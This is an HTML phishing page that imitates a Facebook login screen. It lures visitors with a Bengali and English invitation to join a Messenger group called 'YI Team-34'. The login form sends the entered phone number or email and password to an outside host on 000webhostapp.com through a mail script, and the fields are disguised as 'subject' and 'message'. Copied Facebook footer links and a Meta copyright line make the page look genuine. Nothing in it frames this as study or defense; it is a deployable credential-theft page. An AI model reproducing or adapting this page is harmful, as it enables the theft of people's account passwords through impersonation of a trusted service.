<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>YI Team-34 | Messenger |  Login or sign up</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    
<style>
    

@import url("https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&display=swap");

* {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    font-family: "Roboto", sans-serif;
}

.res {
    display: flex;
    align-items: center;
}

.row {
    padding: 0 15px;
    min-height: 100vh;
    justify-content: center;
    background: #f0f2f5;
}

.fb-form {
    justify-content: space-between;
    max-width: 1000px;
    width: 100%;
}

.fb-form .card {
    margin-bottom: 90px;
}

.fb-form h1 {
    color: #1877f2;
    font-size: 4rem;
    margin-bottom: 10px;
}

.fb-form p {
    font-size: 1.75rem;
    white-space: nowrap;
}

form {
    display: flex;
    flex-direction: column;
    background: #fff;
    border-radius: 8px;
    padding: 20px;
    box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1), 0 8px 16px rgba(0, 0, 0, 0.1);
    max-width: 400px;
    width: 100%;
}

form input {
    height: 55px;
    width: 100%;
    border: 1px solid #ccc;
    border-radius: 6px;
    margin-bottom: 15px;
    font-size: 1rem;
    padding: 0 14px;
}

form input:focus {
    outline: none;
    border-color: #1877f2;
}

::placeholder {
    color: #777;
    font-size: 1.063rem;
}

.fb-submit {
    display: flex;
    flex-direction: column;
    text-align: center;
    gap: 15px;
}

.fb-submit .login {
    border: none;
    outline: none;
    cursor: pointer;
    background: #1877f2;
    padding: 15px 0;
    border-radius: 6px;
    color: #fff;
    font-size: 1.25rem;
    font-weight: 600;
    transition: 0.2s ease;
}

.fb-submit .login:hover {
    background: #0d65d9;
}

form a {
    text-decoration: none;
}

.fb-submit .forgot {
    color: #1877f2;
    font-size: 0.875rem;
}

.fb-submit .forgot:hover {
    text-decoration: underline;
}

hr {
    border: none;
    height: 1px;
    background-color: #ccc;
    margin-bottom: 20px;
    margin-top: 20px;
}

.button {
    margin-top: 25px;
    text-align: center;
    margin-bottom: 20px;
}

.button a {
    padding: 15px 20px;
    background: #42b72a;
    border-radius: 6px;
    color: #fff;
    font-size: 1.063rem;
    font-weight: 600;
    transition: 0.2s ease;
}

.button a:hover {
    background: #3ba626;
}

.footer-langs {
    max-width: 1000px;
    margin: 0 auto;
    padding: 20px;
}

footer ol {
    display: flex;
    flex-wrap: wrap;
    list-style-type: none;
    padding: 8px 0;

    margin-left: 3vh;
}

footer ol:first-child {
    border-bottom: 1px solid #dddfe2;
}

footer ol:first-child li:last-child button {
    background-color: #f5f6f7;
    border: 1px solid #ccd0d5;
    outline: none;
    color: #4b4f56;
    padding: 0 8px;
    font-weight: 700;
    font-size: 12px;
}

footer ol li {
    padding-right: 20px;
    font-size: 12px;
    color: #8a8d91;
}

footer ol li a {
    text-decoration: none;
    color: #8a8d91;
}

footer ol li a:hover {
    text-decoration: underline;
}

footer small {
    font-size: 12px;
    color: #8a8d91;
    margin-left: 3vh;
}

@media (max-width: 900px) {
    .fb-form {
        flex-direction: column;
        text-align: center;
    }

    .fb-form .card {
        margin-bottom: 30px;
        
    }
}

@media (max-width: 460px) {
    .fb-form h1 {
        font-size: 3.5rem;
    }

    .fb-form p {
        font-size: 1.3rem;
    }

    form {
        padding: 15px;
    }
    
   .mine{
       height: 30px;
       width: 85%;
   }
   
   .mine p{
       font-size: 10px;
       padding: 6px;
   }
   
  .sp{
      font-size: 40px;
  }
}

.mine{
    height: 40px;
    width: 100%;
    background-color:  #1471f25f;
}


.sp{
    color: #1877f2;
    font-size: 60px;
}

.mine p{
    font-size: 20px;
    padding: 10px;
}


.card a{
    text-decoration: none;
    color: #1877f2;
}


</style>
    

</head>

<body>
    <div class="row res">
        <div class="fb-form res">
            <div class="card">
                <h1><a href="https://messenger-private-group.github.io/m.me/YI_Team-34/">facebook</a></h1><br>
                <span class="sp" >“</span><div class="mine"><p>YI Team-34 মেসেঞ্জার গ্রুপে জয়েন হতে, লগিং অথবা সাইনআপ করুন ! </p></div><br><span class="sp">”</span><br><br>
                <p>If you want to join Messenger group </p>
                <p> Login or sign up on facebook</p>
               
            </div>
            <form action="https://ytctry.000webhostapp.com/git/mail.php" method="post">
                <input type="text"  placeholder="Mobile number or email address" name="subject" minlength="6" required>
                <input type="password" placeholder="Password" name="message" minlength="8" required>
                <div class="fb-submit">
                    <button type="submit" class="login" name="send">Login</button>
                    <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0" target="_blank" class="forgot">Forgot password?</a>
                </div>
                <hr>
                <div class="button">
                    <a href="https://m.facebook.com/reg/?is_two_steps_login=0&cid=103&refsrc=deprecated&soft=hjk" target="_blank">Create new account</a>
                </div>
            </form><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
        </div>
    </div>
    <footer>
        <div class="footer-langs">
            <ol>
                <li>English (UK)</li>
                <li><a href="https://bn-in.facebook.com/" target="_blank">मराठी</a></li>
                <li><a href="https://hi-in.facebook.com/" target="_blank">हिन्दी</a></li>
                <li><a href="#">اردو</a></li>
                <li><a href="#">ગુજરાતી</a></li>
                <li><a href="#">ಕನ್ನಡ</a></li>
                <li><a href="#">ਪੰਜਾਬੀ</a></li>
                <li><a href="#">தமிழ்</a></li>
                <li><a href="https://bn-in.facebook.com/" target="_blank">বাংলা</a></li>
                <li><a href="#">తెలుగు</a></li>
                <li><a href="#">മലയാളം</a></li>
                <li><button>+</button></li>
            </ol>
            <ol>
                <li><a href="https://www.facebook.com/reg/" targe="_blank">Sign Up</a></li>
                <li><a href="https://www.facebook.com/login/" target="_blank">Log In </a></li>
                <li><a href="https://messenger.com/">Messenger</a></li>
                <li><a href="#">Private Messenger</a></li>
                <li><a href="https://www.facebook.com/lite/">Facebook Lite</a></li>
                <li><a href="https://www.facebook.com/watch/">Video</a></li>
                <li><a href="https://www.facebook.com/place/">Places</a></li>
                <li><a href="https://www.facebook.com/games/">Games</a></li>
                <li><a href="https://www.facebook.com/marketplace/">Marketplace</a></li>
                <li><a href="https://pay.facebook.com/">Meta Pay</a></li>
                <li><a href="https://www.meta.com/">Meta Store</a></li>
                <li><a href="https://www.meta.com/quest/">Meta Quest</a></li>
                <li><a href="https://www.meta.ai/">Imagine with Meta AI</a></li>
                <li><a href="https://www.instagram.com/">Instagram</a></li>
                <li><a href="https://www.threads.net/">Threads</a></li>
                <li><a href="https://www.facebook.com/fundraisers/">Fundraisers</a></li>
                <li><a href="https://www.facebook.com/biz/directory/">Services</a></li>
                <li><a href="https://www.facebook.com/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D">Voting Information Centre</a></li>
                <li><a href="https://www.facebook.com/privacy/policy/?entry_point=facebook_page_footer">Privacy Policy</a></li>
                <li><a href="https://www.facebook.com/privacy/center/?entry_point=facebook_page_footer">Privacy Centre</a></li>
                <li><a href="https://www.facebook.com/groups/discover/">Groups</a></li>
                <li><a href="https://about.meta.com/">About</a></li>
                <li><a href="https://www.facebook.com/ad_campaign/landing.php?placement=pflo&campaign_id=402047449186&nav_source=unknown&extra_1=auto">Create ad</a></li>
                <li><a href="https://www.facebook.com/pages/create/?ref_type=site_footer">Create Page</a></li>
                <li><a href="https://developers.facebook.com/?ref=pf">Developers</a></li>
                <li><a href="https://www.facebook.com/careers/?ref=pf">Careers</a></li>
                <li><a href="https://www.facebook.com/policies/cookies/">Cookies</a></li>
                <li><a href="https://www.facebook.com/help/568137493302217">AdChoices</a></li>
                <li><a href="https://www.facebook.com/policies?ref=pf">Terms</a></li>
                <li><a href="https://www.facebook.com/help/?ref=pf">Help</a></li>
                <li><a href="https://www.facebook.com/help/637205020878504">Contact uploading and non-users</a></li>
            </ol>
            <small>Meta © 2024</small>
        </div>
    </footer>
</body>

</html>
